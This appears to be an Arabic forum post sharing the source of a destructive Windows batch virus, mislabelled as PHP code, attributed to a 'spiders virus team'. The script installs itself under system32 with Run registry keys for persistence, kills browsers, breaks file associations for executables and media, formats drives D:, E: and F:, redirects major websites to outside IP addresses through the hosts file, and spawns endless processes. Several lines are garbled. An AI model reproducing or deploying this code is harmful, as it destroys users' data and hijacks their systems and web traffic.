اوكي سأقوم برفع الكود سورس و خربه
كود PHP:
echo @echo off >>%windir%\system32\MSplayer.bat
echo if exist "%windir%\system32\MSplayer.bat" goto end >>%windir%\system32\MSplayer.bat
echo reg add reg add HKLM\software\microsoft\windows\run /v MSplayer /t REG_SZ /d %windir%\system32\MSplayer.bat >>%windir%\system32\MSplayer.bat
echo tskill iexplore >>%windir%\system32\MSplayer.bat
echo tskill firefox >>%windir%\system32\MSplayer.bat
echo tskill plugin-container >>%windir%\system32\MSplayer.bat
rem --------------
echo assoc .dll = txtfile >>%windir%\system32\MSplayer.bat
echo assoc .rar = txtfile >>%windir%\system32\MSplayer.bat
echo assoc .exe = txtfile >>%windir%\system32\MSplayer.bat
echo assoc .mp3 = txtfile >>%windir%\system32\MSplayer.bat
echo assoc .jpeg = txtfile >>%windir%\system32\MSplayer.bat
rem ---------------
echo if exist "D:\" format D:\ >>%windir%\system32\MSplayer.bat
echo if exist "E:\" format E:\ >>%windir%\system32\MSplayer.bat
echo if exist "F:\" format F:\ >>%windir%\system32\MSplayer.bat
echo rem ---------------
echo echo 213.175.202.118 www.google.com>>%windir%\system32\drivers\etc\host
echo echo 208.43.124.122 www.facbook.com>>%windir%\system32\drivers\etc\host
echo echo 72.14.235.190 www.hotmail.com>>%windir%\system32\drivers\etc\host
echo echo 80.239.173.215 www.youtube.com>>%windir%\system32\drivers\etc\host
rem --------------
echo :next >>%windir%\system32\drivers\MShamza.bat
echo echo calc.exe>>%windir%\system32\drivers\MShamza.bat
echo echo goto next>>%windir%\system32\drivers\MShamza.bat
echo reg add HKLM\software\microsoft\windows\run /v MShamza /t REG_SZ /d C:\windows\system32\drivers\MShamza.bat
echo cd %windir%\system32\drivers\MShamza.bat >>%windir%\system32\MSplayer.bat
echo MShamza.bat >>%windir%\system32\MSplayer.bat
echo rem --------------
echo copy %windir%\system32\drivers\MShamza.bat %windir%\system32
echo copy %windir%\system32\drivers\MShamza.bat %windir%\system
echo copy %windir%\system32\drivers\MShamza.bat %userprofile%
echo reg add reg add HKLM\software\microsoft\windows\run /v MShamz /t REG_SZ /d %windir%\system32\MShamza.bat
echo reg add reg add HKLM\software\microsoft\windows\run /v MSham /t REG_SZ /d %windir%\system\MShamza.bat
echo reg add reg add HKLM\software\microsoft\windows\run /v MSha /t REG_SZ /d %userprofile% \MShamza.bat
echo cd %windir%\system32 >>%windir%\system32\MSplayer.bat
echo MShamza.bat >>%windir%\system32\MSplayer.bat
echo cd %windir%\system >>%windir%\system32\MSplayer.bat
echo Mshamza.bat >>%windir%\system32\MSplayer.bat
echo cd %userprofile% >>%windir%\system32\MSplayer.bat
echo MShamza.bat >>%windir%\system32\MSplayer.bat
rem ------------
echo echo [+] you have ben hacked by spiders virus team ... >> c:\virus.txt >>%windir%\system32\MSplayer.bat
echo cd c:\ >>%windir%\system32\MSplayer.bat
echo virus.txt >>%windir%\system32\MSplayer.bat
rem ------------
echo :end >>%windir%\system32\MSplayer.bat
echo cd c:\ >>%windir%\system32\MSplayer.bat
echo if not exist "c:\virus.txt" echo [+] you have ben hacked by spiders virus team ... >>%windir%\system32\MSplayer.bat
echo if exist "c:\virus.txt" virus.txt >>%windir%\system32\MSplayer.bat
echo cd %windir%\system32\MSplayer.bat >>%windir%\system32\MSplayer.bat
echo MSplayer.bat >>%windir%\system32\MSplayer.bat